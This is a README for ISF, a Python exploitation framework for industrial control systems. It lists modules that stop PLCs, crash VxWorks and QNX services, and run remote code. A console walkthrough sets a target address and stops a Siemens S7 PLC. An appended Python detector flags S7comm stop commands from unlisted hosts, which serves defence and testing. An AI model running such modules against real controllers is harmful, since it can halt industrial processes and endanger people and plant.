ISF (Industrial Control System Exploitation Framework) is an exploitation framework written in Python. ISF is based on the open source project routersploit.

ICS Protocol Clients

Name | Path | Description
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP Client
wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 Client (Vxworks 6.x)
s7_client | icssploit/clients/s7_client.py | s7comm Client (S7 300/400 PLC)

Exploit Module

Name | Path | Description
s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start/stop
s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC start/stop/reset
vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC remote dos (CVE-2015-7599)
quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 series PLC start/stop
crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP service dos
qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX qconn remote code execution
profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Profinet DCP device IP config

Scanner Module

Name | Path | Description
profinet_dcp_scan | scanners/profinet_dcp_scan.py | Profinet DCP scanner
vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x scanner
s7comm_scan | scanners/s7comm_scan.py | S7comm scanner
enip_scan | scanners/enip_scan.py | EthernetIP scanner

ICS Protocols Module (Scapy Module)

These protocols can be used in other fuzzing frameworks such as Kitty, or to create your own client.

Name | Path | Description
pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol
modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol
wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol
s7comm | icssploit/protocols/s7comm.py | S7comm Protocol

Install

Python requirements

Install on Kali

git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Usage

root@kali:~/Desktop/temp/isf# python isf.py
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0

Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >

Exploits

isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

You can use the tab key for completion.

Options

Display module options:

isf (S7-300/400 PLC Control) > show options
Target options:
   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port
Module options:
   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >

Set options

isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Run module

isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Display information about exploit

isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
wenzhe zhu

References:
isf (S7-300/400 PLC Control) >
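
A defender's view of the start/stop module shown above, as an added example that is not part of ISF or the original page: a parser that flags S7comm CPU state-change jobs on port 102 when they come from a host outside an allowlist. The function codes 0x28 and 0x29 follow the naming in the Wireshark s7comm dissector; the allowlist, the addresses and the test frames (headers and function byte only) are constructed for illustration.

```python
import struct

S7_PORT = 102  # ISO-on-TCP port from the module options above
# Job function codes as named in the Wireshark s7comm dissector (not stated on this page).
STATE_CHANGE = {0x28: "PI service (includes PLC start)", 0x29: "PLC stop"}

def classify_s7_payload(payload):
    """Return the CPU state-change job named in one TPKT/COTP/S7comm payload, else None."""
    if len(payload) < 7 or payload[0] != 0x03:      # TPKT version must be 3
        return None
    (tpkt_len,) = struct.unpack_from(">H", payload, 2)
    s7 = 4 + 1 + payload[4]                         # TPKT(4) + COTP length byte + COTP header
    if payload[5] != 0xF0 or tpkt_len > len(payload) or tpkt_len < s7 + 11:
        return None                                 # not a COTP data TPDU, or truncated
    if payload[s7] != 0x32 or payload[s7 + 1] != 0x01:
        return None                                 # not S7comm, or not a Job request
    (param_len,) = struct.unpack_from(">H", payload, s7 + 6)
    if param_len < 1:
        return None
    return STATE_CHANGE.get(payload[s7 + 10])       # first parameter byte = function code

def find_state_changes(records, engineering_hosts):
    """records: (src, dst, dport, payload) tuples. Flag start/stop jobs from unlisted hosts."""
    alerts = []
    for src, dst, dport, payload in records:
        if dport != S7_PORT:
            continue
        job = classify_s7_payload(payload)
        if job and src not in engineering_hosts:
            alerts.append((src, dst, job))
    return alerts

def build_test_frame(rosctr, function):
    """Constructed test frame: headers plus the function byte only, parameter body omitted."""
    s7 = struct.pack(">BBHHHH", 0x32, rosctr, 0, 1, 1, 0) + bytes([function])
    cotp = bytes([0x02, 0xF0, 0x80])
    return struct.pack(">BBH", 3, 0, 4 + len(cotp) + len(s7)) + cotp + s7

SAMPLE = [  # constructed records, addresses are illustrative
    ("192.168.70.50", "192.168.70.210", 102, build_test_frame(0x01, 0x04)),  # read variable
    ("192.168.70.99", "192.168.70.210", 102, build_test_frame(0x01, 0x29)),  # stop, unlisted host
    ("192.168.70.50", "192.168.70.210", 102, build_test_frame(0x01, 0x29)),  # stop, listed host
    ("192.168.70.99", "192.168.70.210", 502, build_test_frame(0x01, 0x29)),  # other port, ignored
]

if __name__ == "__main__":
    for alert in find_state_changes(SAMPLE, {"192.168.70.50"}):
        print(alert)
```

The classifier inspects one TCP payload at a time, so a sensor feeding it must reassemble TCP segments first.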